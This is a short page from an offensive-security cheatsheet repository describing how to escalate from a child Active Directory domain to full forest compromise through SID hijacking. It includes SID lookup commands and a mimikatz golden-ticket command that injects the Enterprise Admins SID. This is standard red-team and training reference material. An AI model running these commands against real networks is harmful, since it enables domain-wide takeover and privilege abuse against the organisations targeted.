daemon-sec-cheatsheet

The cheatsheet vault for operators: AD, enumeration, exploitation, priv-esc, web, DFIR
git clone https://git.daemon-sec.xyz/daemon-sec-cheatsheet.git
Log | Files | Refs | README | LICENSE

trust-sid-hijacking.md (1263B)


      1 ---
      2 title: "Child Domain to Forest Compromise - SID Hijacking"
      3 section: "Active Directory"
      4 sectionSlug: "active-directory"
      5 sourcePath: "docs/active-directory/trust-sid-hijacking.md"
      6 sourceUrl: "https://github.com/swisskyrepo/InternalAllTheThings/blob/203bb0c0b290/docs/active-directory/trust-sid-hijacking.md"
      7 sha: "203bb0c0b290"
      8 isIndex: false
      9 ---
     10 
     11 # Child Domain to Forest Compromise - SID Hijacking
     12 
     13 Most trees are linked with dual sided trust relationships to allow for sharing of resources.
     14 By default the first domain created if the Forest Root.
     15 
     16 **Requirements**:
     17 
     18 - KRBTGT Hash
     19 - Find the SID of the domain
     20 
     21     ```powershell
     22     $ Convert-NameToSid target.domain.com\krbtgt
     23     S-1-5-21-2941561648-383941485-1389968811-502
     24 
     25     # with Impacket
     26     lookupsid.py domain/user:password@10.10.10.10
     27     ```
     28 
     29 - Replace 502 with 519 to represent Enterprise Admins
     30 
     31 **Exploitation**:
     32 
     33 - Create golden ticket and attack parent domain.
     34 
     35     ```powershell
     36     kerberos::golden /user:Administrator /krbtgt:HASH_KRBTGT /domain:domain.local /sid:S-1-5-21-2941561648-383941485-1389968811 /sids:S-1-5-SID-SECOND-DOMAIN-519 /ptt
     37     ```
     38 
     39 ## References
     40 
     41 - [Training - Attacking and Defending Active Directory Lab - Altered Security](https://www.alteredsecurity.com/adlab)